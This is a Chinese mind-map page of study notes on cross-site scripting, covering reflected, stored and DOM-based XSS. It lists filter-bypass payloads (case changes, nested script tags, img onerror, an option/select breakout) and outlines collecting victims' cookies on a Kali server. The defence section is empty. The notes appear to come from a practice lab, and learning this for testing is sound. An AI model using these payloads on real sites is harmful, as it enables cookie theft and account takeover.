导图社区 XSS
关于xss的思维导图,主要内容有反射型(非持久型)、存储型(持久型)、DOM型、防御。
社区模板帮助中心,点此进入>>
论语孔子简单思维导图
《傅雷家书》思维导图
《童年》读书笔记
《茶馆》思维导图
《朝花夕拾》篇目思维导图
《昆虫记》思维导图
《安徒生童话》思维导图
《鲁滨逊漂流记》读书笔记
《这样读书就够了》读书笔记
妈妈必读:一张0-1岁孩子认知发展的精确时间表
XSS
反射型(非持久型)
<script>alert(document.cookie)</script>
有过滤script
替换
str_replace
<SCRIPT>alert(document.cookie)</SCRIPT>
<scr<script>ipt>alert(document.cookie)</script>
正则过滤
preg_replace
<img src=1 onerror=alert(document.cookie)>
存储型(持久型)
跨站脚本攻击
在kali中开启apache2在 www文件下创建2个文件
在攻击对象上注入
攻击机的地址(kali地址)
对方每一次访问则可不停获取对方cookie
限制字符
利用Burp_Suite进行改包获取
DOM型
有过滤
<img scr=1 onerror=alert(document.cookie)>
GET 传入的参数存在了option里
对它进行包含
></option></select><script>alert(document.cookie)</script>
白名单机制
switch
# <script>alert(document.cookie)</script>
# 注释判断 然后获取cookie
防御
